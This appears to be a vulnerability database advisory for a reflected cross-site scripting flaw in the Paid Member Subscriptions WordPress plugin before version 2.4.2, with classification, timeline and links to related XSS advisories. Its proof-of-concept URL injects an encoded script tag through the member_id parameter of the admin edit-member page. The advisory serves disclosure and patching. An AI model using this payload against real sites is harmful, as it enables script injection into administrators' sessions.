WordPress Plugin Vulnerabilities

Paid Member Subscriptions < 2.4.2 - Reflected Cross-Site Scripting (XSS)

Description

The plugin was vulnerable to a Reflected Cross-Site Scripting (XSS) on the edit member page.

No CSRF nonce was required.

Proof of Concept

http://www.example.com/wp-admin/admin.php?page=pms-members-page&subpage=edit_member&member_id=1%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Affects Plugins

Plugin icon
paid-member-subscriptions
Fixed in 2.4.2

References

URL
https://plugins.trac.wordpress.org/changeset/2566399/paid-member-subscriptions

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
7.1 (high)

Miscellaneous

Verified
Yes
WPVDB ID
a6fef63c-d588-4431-b06f-72d1fa25b2f7

Timeline

Publicly Published
2021-07-26 (about 2 years ago)
Added
2021-07-26 (about 2 years ago)
Last Updated
2021-07-26 (about 2 years ago)

Other

Published
Title
Published
2022-04-26
Title
Gwyn's Imagemap Selector <= 0.3.3 - Reflected Cross-Site Scripting
Published
2015-08-05
Title
WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Published
2021-01-20
Title
Under Construction < 3.86 - Authenticated Stored Cross-Site Scripting (XSS)
Published
2019-01-14
Title
easy-redirect-manager 2.18.18 - Cross-Site Scripting (XSS)
Published
2022-06-02
Title
Flower Delivery by Florist One <= 3.7 - Admin+ Stored Cross-Site Scripting